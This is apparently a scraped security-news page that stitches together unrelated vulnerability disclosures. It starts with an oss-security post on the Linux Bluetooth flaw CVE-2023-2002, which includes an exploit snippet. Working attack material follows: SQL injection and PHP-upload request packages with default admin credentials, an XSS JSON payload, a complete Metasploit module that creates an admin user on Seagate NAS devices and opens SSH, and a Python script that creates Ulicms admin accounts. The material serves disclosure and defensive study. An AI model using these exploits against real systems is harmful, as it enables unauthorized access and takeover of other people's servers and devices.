A vulnerability was found in the HCI sockets implementation due to a missing capability check in net/bluetooth/hci_sock.c in the Linux Kernel. This flaw allows an attacker to unauthorized execution of management commands, compromising the confidentiality, integrity, and availability of Bluetooth communication.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Sun, 16 Apr 2023 18:12:18 +0800
From: Ruihan Li <lrh2000@....edu.cn>
To: oss-security@...ts.openwall.com
Cc: Ruihan Li <lrh2000@....edu.cn>
Subject: CVE-2023-2002: Linux Bluetooth: Unauthorized management command
 execution

Hi,

An insufficient permission check has been found in the Bluetooth subsystem of
the Linux kernel when handling ioctl system calls of HCI sockets. This causes
tasks without the proper CAP\_NET\_ADMIN capability can easily mark HCI sockets
as \_trusted\_. Trusted sockets are intended to enable the sending and receiving
of management commands and events, such as pairing or connecting with a new
device.  As a result, unprivileged users can acquire a trusted socket, leading
to unauthorized execution of management commands. The exploit requires only
the presence of a set of commonly used setuid programs (e.g., su, sudo).

## Cause

The direct cause of the vulnerability is the following code snippet:
\`\`\`c
static int hci\_sock\_ioctl(struct socket \*sock, unsigned int cmd,
                          unsigned long arg)
{
	...
        if (hci\_sock\_gen\_cookie(sk)) {
		...
                if (capable(CAP\_NET\_ADMIN))
                        hci\_sock\_set\_flag(sk, HCI\_SOCK\_TRUSTED);
		...
        }
	...
}
\`\`\`

The implementation of an ioctl system call verifies whether the task invoking
the call has the necessary CAP\_NET\_ADMIN capability to update the
HCI\_SOCK\_TRUSTED flag. However, this check only considers the calling task,
which may not necessarily be the socket opener. For instance, the socket can
be shared with another task using fork and execve, where the latter task may
be privileged, such as a setuid program. Moreover, if the socket is used as
stdout or stderr, an ioctl call is made to obtain tty parameters, which can be
verified through the strace command.
\`\`\`
# strace -e trace=ioctl sudo > /dev/null
ioctl(3, TIOCGPGRP, \[30305\])            = 0
ioctl(2, TIOCGWINSZ, {ws\_row=45, ws\_col=190, ws\_xpixel=0, ws\_ypixel=0}) = 0
\`\`\`

The ioctl calls for tty parameters will never succeed on HCI sockets, but they
are sufficient to mark HCI sockets as trusted. Therefore, an unprivileged
program can hold trusted HCI sockets, enabling it to send and receive
management commands and events, since the trusted flag will never be cleared.

## Exploit

The exploitation can be as easy as below:
\`\`\`c
	int fd = socket(PF\_BLUETOOTH, SOCK\_RAW, BTPROTO\_HCI);

	/\* By executing sudo with an HCI socket as stderr, an ioctl
	 \* system call makes the HCI socket privileged (i.e. with
	 \* the HCI\_SOCK\_TRUSTED flag set).
	 \*/
	int pid = fork();
	if (pid == 0) {
		dup2(fd, 2);
		close(fd);
		execlp("sudo", "sudo");
	}

	waitpid(pid, NULL, 0);

	struct sockaddr\_hci haddr;
	haddr.hci\_family = AF\_BLUETOOTH;
	haddr.hci\_dev = HCI\_DEV\_NONE;
	haddr.hci\_channel = HCI\_CHANNEL\_CONTROL;

	/\* The socket has not been bound. It can be bound to the
	 \* management channel now. After that, the HCI\_SOCK\_TRUSTED
	 \* flag is still present, as it will indeed never be cleared.
	 \*/
	bind(fd, (struct sockaddr \*)&haddr, sizeof(haddr));
\`\`\`

Furthermore, btmon can be used to confirm that the socket becomes trusted and
successive management commands will succeed:
\`\`\`
# btmon
@ RAW Open: sudo (privileged) version 2.22
@ RAW Close: sudo
@ MGMT Open: sudo (privileged) version 1.22
@ MGMT Command: Set Powered (0x0005) plen 1
        Powered: Disabled (0x00)
@ MGMT Event: Command Complete (0x0001) plen 7
      Set Powered (0x0005) plen 4
        Status: Success (0x00)
\`\`\`

A full PoC exploit to change the power state of Bluetooth devices can be found
\[on GitHub\]\[exp\].

\[exp\]: https://github.com/lrh2000/CVE-2023-2002/tree/master/exp

## Impact

If successfully exploited, the identified vulnerability has the potential to
compromise the confidentiality, integrity, and availability of Bluetooth
communication. Attackers can exploit this vulnerability to pair the controller
with malicious devices, even if the Bluetooth service is disabled or not
installed. It is also possible to prevent specific devices from being paired,
or read some sensitive information such as the OOB data.

## Affection

The exploitable vulnerability has been present in the Linux kernel since v4.9.
More specifically, it becomes exploitable after the \[commit f81f5b2db869\]\[cm\]
("Bluetooth: Send control open and close messages for HCI raw sockets"). Prior
to this commit, exploiting the vulnerability required tricking a privileged
program into binding an HCI socket, which is very hard (if not impossible) to
trigger in practice. However, after the commit, it requires only tricking a
privileged program to invoke an ioctl system call, which relies only on the
existence of an setuid program, as illustrated above.

\[cm\]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f81f5b2db869

The exploitation works as long as there are setuid programs (or more
precisely, programs with the CAP\_NET\_ADMIN capability) that invokes ioctl
calls on stdin, stdout, or stderr. In most Linux distros, a quick (but very
coarse) test reveals that quite a few setuid programs are using ioctl system
calls, which are marked with 'V' in the table below:
\`\`\`
# find . -user root -perm -4000 -exec sh -c "strace -e trace=ioctl {} < /dev/null 2>&1 > /dev/null | grep ioctl > /dev/null && echo -n 'V ' || echo -n 'S '; echo {};" \\; | sort
S ./chage
S ./expiry
S ./fusermount
S ./fusermount3
S ./gpasswd
S ./ksu
S ./mount.cifs
S ./sg
S ./umount
V ./chfn
V ./chsh
V ./mount
V ./newgrp
V ./passwd
V ./pkexec
V ./screen-4.9.0
V ./su
V ./sudo
V ./unix\_chkpwd
\`\`\`
After manually checking the strace output, it is found that all of these ioctl
users are using ioctl calls on stdin, stdout, or stderr to get or set some tty
parameters. Note that exactly no arguments are passed to these setuid
programs. If some crafted arguments are passed, the number of ioctl users may
increase. As a result, a number of linux distros can be vulnerable to the
exploitation.

As a side note, Android devices, however, are unlikely to be affected since
the exploitation requires the existence of setuid programs, which Android has
\[avoided using\]\[su\] for some time. Besides, there are also no applications
with the CAP\_NET\_ADMIN capability on Android.

\[su\]: https://source.android.com/docs/security/enhancements/enhancements43

## Mitigation

\[A patch\]\[fi\] has been posted to the linux-bluetooth mailing list which fixes
this vulnerability by replacing capable() with sk\_capable(), where
sk\_capable() checks not only the current task but also that the socket opener
has the required capability. At the same time, \[another submitted patch\]\[se\]
hardens the ioctl processing logic by checking command validity at the start
of hci\_sock\_ioctl() and returning with an ENOIOCTLCMD error code immediately
before doing anything if the command is invalid.

\[fi\]: https://lore.kernel.org/linux-bluetooth/20230416081404.8227-1-lrh2000@pku.edu.cn
\[se\]: https://lore.kernel.org/linux-bluetooth/20230416080251.7717-1-lrh2000@pku.edu.cn

As a workaround, if the Bluetooth devices are not being used at all (but it is
not feasible to physically remove the device), it is possible to simply block
the devices using rfkill, which will prevent the devices from being powered
up. By doing so, sending management commands to power up Bluetooth devices
won't succeed. This can significantly reduce the impact of this vulnerability.

There are two ways to avoid similar vulnerabilities in the future: hardening
the Linux kernel and hardening userspace setuid programs.
 - There are many uses of capable() in the Linux kernel that check the
   capability of the current task, but do nothing about the file or socket
   opener. In many cases, it may be reasonable to also check the capability of
   the opener. However, adding more capability checks can lead to unexpected
   regressions, although no such examples in reality have been seen at the
   time of writing.
 - Stdin, stdout, and stderr are different from other file descriptors,
   because they are inherited from the parent task but are used directly by
   the current task. For privileged setuid programs, inherited file
   descriptors may need to be treated as untrusted. Therefore, it also seems
   reasonable to explicitly drop privileges when invoking system calls on
   these untrusted file descriptors.

## Relation

This vulnerability shares exactly the same principle as \[CVE-2014-0181\]\[c14\]. In
the case of CVE-2014-0181, the issue was the lack of a mechanism to authorize
Netlink operations based on the opener of the socket, which allows local users
to modify network configurations by using a Netlink socket for the stdout or
stderr of a setuid program.

\[c14\]: https://nvd.nist.gov/vuln/detail/CVE-2014-0181

## Timeline

\*\*2023-04-04:\*\* I discovered this vulnerability during my audit of the
Bluetooth protocol stack in the Linux kernel.

\*\*2023-04-09:\*\* I have reported this vulnerability to the Linux kernel
security team and distribution vendors, with an initial version of patches.

\*\*2023-04-12:\*\* This vulnerability has been assigned a CVE ID, which is
CVE-2023-2002.

\*\*2023-04-13:\*\* After several days of discussion with the maintainers, the
patches have been updated accordingly.

\*\*2023-04-16:\*\* The vulnerability was disclosed on the public oss-security
mailing list (here) and \[on GitHub\]\[gh\]. Two patches have been posted to the
public linux-bluetooth mailing list (\[first\]\[fi\], \[second\]\[se\]).

\[gh\]: https://github.com/lrh2000/CVE-2023-2002

Thanks,
Ruihan Li

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-2002: security - CVE-2023-2002: Linux Bluetooth: Unauthorized management command execution

A lateral privilege escalation vulnerability in XXL-Job v2.4.1 allows users to execute arbitrary commands on another user's account via a crafted POST request to the component /jobinfo/.

CVE-2023-33779: GitHub - xuxueli/xxl-job: A distributed task scheduling framework.（分布式任务调度平台XXL-JOB）

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id=.

**Faculty Evaluation System v1.0 by oretnom23 has SQL injection**

Admin account password： admin@admin.com/admin123

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /eval/admin/manage\_task.php?id=

Vulnerability location: /eval/admin/manage\_task.php?id=, id

Vulnerability sql: $qry = $conn->query("SELECT * FROM task_list where id = ".$_GET['id'])->fetch_array();

dbname =evaluation\_db

\[+\] Payload: /eval/admin/manage\_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /eval/admin/manage\_task.php?id\=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lrrse02i69soj9l3lnarhnd9ck
Connection: close

CVE-2023-33439: bug_report/SQLi-1.md at main · F14me7wq/bug_report

Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user.

Permalink

Cannot retrieve contributors at this time

**Faculty Evaluation System v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: WuQi Qi and Zhihong Tian, Guangzhou University

vendors: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html

The program is built using the xmapp-php8.1 version

Login account: admin@admin.com/admin123 (Super Admin account)

Vulnerability url: ip/eval/ajax.php?action=save\_user

Loophole location: Faculty Evaluation System's "/eval/ajax.php?action=save\_user" file exists arbitrary file upload (RCE)

Request package for file upload：

POST /eval/ajax.php?action\=save\_user HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/eval/index.php?page=edit\_user&id=1
Content-Length: 818
Content-Type: multipart/form-data; boundary=---------------------------1037163726497
Cookie: PHPSESSID=qm3tmf7esa9t4jsgeln6vna57r
Connection: close
\-----------------------------1037163726497
Content-Disposition: form-data; name="id"
1
\-----------------------------1037163726497
Content-Disposition: form-data; name="firstname"
Administrator
\-----------------------------1037163726497
Content-Disposition: form-data; name="lastname"
a
\-----------------------------1037163726497
Content-Disposition: form-data; name="img"; filename="hack.php"
Content-Type: application/octet-stream
<?php phpinfo();?>
\-----------------------------1037163726497
Content-Disposition: form-data; name="email"
admin@admin.com
\-----------------------------1037163726497
Content-Disposition: form-data; name="password"
\-----------------------------1037163726497
Content-Disposition: form-data; name="cpass"
\-----------------------------1037163726497--

The uploaded file path has returned in response.

The files will be uploaded to this directory \\eval\\assets\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2023-33440: bug_report/RCE-1.md at main · F14me7wq/bug_report

skycaiji v2.5.4 is vulnerable to Cross Site Scripting (XSS). Attackers can achieve backend XSS by deploying malicious JSON data.

Firstly, you can download the source code from the following website

https://down.chinaz.com/api/index/download?id=38972&type=code

Directly place it in the root directory of the website, access the server IP, and follow the prompts to install

After installation, log in to the backend.

Click to the above function point

This is a JSON parsing function, but there is no complete xss protection in place.

We can construct a file that returns the JSON format ourselves, then access it, and return it to the JSON format with xss to trigger the xss code in the background.

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  

<?php  
$data = array(  
    'name' => 'John  <img src=\\'x\\' onerror=\\"eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))\\">',  
    'age' => 30,  
    'email' => 'johndoe@example.com',  
);  
   
$json = json\_encode($data);  
   
header('Content-type: application/json');  
echo $json;  

This string of code will return a JSON data with malicious payload.

We will deploy it on our own VPS and induce the backend administrator to parse its data, and we will find that the successful triggering of the xss code

Attackers can use this vulnerability to do anything that JavaScript code can do

CVE-2023-33394: skycaiji-v2.5.4 has a backend xss vulnerability

Nagvis before 1.9.34 was discovered to contain an arbitrary file read vulnerability via the component /core/classes/NagVisHoverUrl.php.

**Commits on Aug 29, 2022**

4.  Fix type juggling vulnerability
    
    PHP evaluates \`!=\` a bit loose on the type. So "0000" == "0e5678" is
    true in PHP. An attacker could send a zeroed cookie\_hash \`"0"\*32\` and
    only need an collision with a calculated hash beginning with \`0e\`
    followed by only numbers.
    
    In our tests (with auth.secret set to \`stable\`) a valid cookie is
    \`cmkadmin:58191275:00000000000000000000000000000000\`.
    
    For a remote attacker this would have needed 58,191,275 guesses.
    
    Maximilian Wirtz authored and LarsMichelsen committed
    
    Aug 29, 2022
    
5.  Mitigate arbitrary file read
    
    With this change the URL is restricted to http and https. So no local
    files can be read. This still is a Server-side request forgery (SSRF).
    
    Maximilian Wirtz authored and LarsMichelsen committed
    
    Aug 29, 2022

CVE-2022-46945: Comparing nagvis-1.9.33...nagvis-1.9.34 · NagVis/nagvis

This Metasploit module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state and register a new admin user which is capable of SSH access.

    ### Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)# Date: Dec 9 2019# Exploit Author: Ege Balci# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/# Version: 2015.0916# CVE : 2020-6627# This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'net/http'require 'net/ssh'require 'net/ssh/command_stream'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::SSH  def initialize(info={})    super(update_info(info,      'Name'           => "Seagate Central External NAS Arbitrary User Creation",      'Description'    => %q{        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state        and register a new admin user which is capable of SSH access.      },      'License'        => MSF_LICENSE,      'Author'         =>        [          'Ege Balcı <egebalci@pm.me>' # author & msf module        ],      'References'     =>        [          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],          ['CVE', '2020-6627']        ],      'DefaultOptions'  =>        {          'SSL' => false,          'WfsDelay' => 5,        },      'Platform'       => ['unix'],      'Arch'           => [ARCH_CMD],      'Payload'        =>      {        'Compat' => {          'PayloadType'    => 'cmd_interact',          'ConnectionType' => 'find'        }      },      'Targets'        =>        [          ['Auto',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD            }          ],        ],      'Privileged'     => true,      'DisclosureDate' => "Dec 9 2019",      'DefaultTarget'  => 0    ))    register_options(      [        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])      ], self.class    )    register_advanced_options(      [        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])      ]    )  end  def check    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')      Exploit::CheckCode::Appears    else      Exploit::CheckCode::Safe    end  end  def exploit    # First get current state    first_state=get_state()    if first_state      print_status("Current device state: #{first_state['state']}")    else      return    end    if first_state['state'] != 'start'      # Set new start state      first_state['state'] = 'start'      res = send_request_cgi({        'method' => 'POST',        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),        'ctype' => 'application/x-www-form-urlencoded',        'data'  => "info=#{first_state.to_json}"      },60)      changed_state=get_state()      if changed_state && changed_state['state'] == 'start'        print_good("State successfully changed !")      else        print_error("Could not change device state")        return      end    end    name = Rex::Text.rand_name_male    user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"    pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)    print_status('Creating new admin user...')    print_status("User: #{user}")    print_status("Pass: #{pass}")    # Add new admin user    res = send_request_cgi({      'method'    => 'POST',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),      'ctype' => 'application/x-www-form-urlencoded',      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      },      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}    },60)    conn = do_login(user,pass)    if conn      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")      handler(conn.lsock)    end  end  def do_login(user, pass)    factory = ssh_socket_factory    opts = {      :auth_methods    => ['password', 'keyboard-interactive'],      :port            => 22,      :use_agent       => false,      :config          => false,      :password        => pass,      :proxy           => factory,      :non_interactive => true,      :verify_host_key => :never    }    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']    begin      ssh = nil      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do        ssh = Net::SSH.start(rhost, user, opts)      end    rescue Rex::ConnectionError      fail_with Failure::Unreachable, 'Connection failed'    rescue Net::SSH::Disconnect, ::EOFError      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"      return    rescue ::Timeout::Error      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"      return    rescue Net::SSH::AuthenticationFailed      print_error "#{rhost}:#{rport} SSH - Failed authentication"    rescue Net::SSH::Exception => e      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"      return    end    if ssh      conn = Net::SSH::CommandStream.new(ssh)      ssh = nil      return conn    end    return nil  end  def get_state    res = send_request_cgi({      'method'    => 'GET',      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    },60)    if res && (res.code == 200 ||res.code == 100)      return res.get_json_document    end    res = nil  endend

Seagate Central Storage 2015.0916 User Creation / Command Execution

Debian Linux Security Advisory 5413-1 - An issue has been found in sniproxy, a transparent TLS and HTTP layer 4 proxy with SNI support. Due to bad handling of wildcard backend hosts, a crafted HTTP or TLS packet might lead to remote arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5413-1                   security@debian.orghttps://www.debian.org/security/                        Thorsten AlteholzMay 26, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : sniproxyCVE ID         : CVE-2023-25076Debian Bug     : 1033752An issue has been found in sniproxy, a transparent TLS and HTTP layer 4proxy with SNI support. Due to bad handling of wildcard backend hosts,a crafted HTTP or TLS packet might lead to remote arbitrary codeexecution.For the stable distribution (bullseye), this problem has been fixed inversion 0.6.0-2+deb11u1.We recommend that you upgrade your sniproxy packages.For the detailed security status of sniproxy please refer toits security tracker page at:https://security-tracker.debian.org/tracker/sniproxyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQEzBAEBCAAdFiEEhhz+aYQl/Bp4OTA7O1LKKgqv2VQFAmRwsRMACgkQO1LKKgqv2VRavQgAuKHflNXCnnu4VYTdqVME/Gkm37TyaxmrIaWliakXlQcz56ZIVBAdbko4mUgqaWBleXcSXRNe/D+9I8ugQUSVzWXNXqOcu9Z+nQzlpHpB+wQR/rMrC97Ep00NLcEELevoz20uDf6ufU+AQixYyfthvncwKcj0TFp4G4VcQboB5CocCVhlXvqEtimch/M117hfKEsD5AJWY04vXicmCqZWrtEjKUSNkZkrRKT/7u4DTkYcYgYsPBKCT0vPGf2XpWEP0bJb7vRyrPq5BnoLXJclF/t6CqD4L9MtBP1gwHPrtJQmgYdjyWm7wKvKAKXINGSUIYDZKOw/3EEkzL2tHOSxng===0CH/-----END PGP SIGNATURE-----

Debian Security Advisory 5413-1

Ulicms version 2023.1 create administrator user via mass assignment exploit.

    #Exploit Title: Ulicms 2023.1 - create admin user via mass assignment#Application: Ulicms#Version: 2023.1-sniffing-vicuna#Bugs:   create admin user via mass assignment#Technology: PHP#Vendor URL: https://en.ulicms.de/#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip#Date of found: 04-05-2023#Author: Mirabbas Ağalarov#Tested on: Linux ##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicunaimport requestsnew_name=input("name: ")new_email=input("email: ")new_pass=input("password: ")url = "http://localhost/dist/admin/index.php"headers = {"Content-Type": "application/x-www-form-urlencoded"}data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="response = requests.post(url, headers=headers, data=data)if response.status_code == 200:    print("Request is success and created new admin account")    else:    print("Request is failure.!!")        #POC video : https://youtu.be/SCkRJzJ0FVk

Ulicms 2023.1 Create Administrator

Zenphoto version 1.6 suffers from multiple persistent cross site scripting vulnerabilities.

    Exploit Title: Zenphoto 1.6 - Multiple stored XSSApplication: Zenphoto-1.6 xss pocVersion: 1.6 Bugs:  XSSTechnology: PHPVendor URL: https://www.zenphoto.org/news/zenphoto-1.6/Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zipDate of found: 01-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================###XSS-1###steps: 1. create new album 2. write Album Description : <iframe src="https://14.rs"></iframe> 3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/=====================================================###XSS-2###steps: 1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)2.change postal code  as <script>alert(4)</script>3.if admin user information import as html , xss will triggerpoc video : https://youtu.be/JKdC980ZbLY

Tag

#php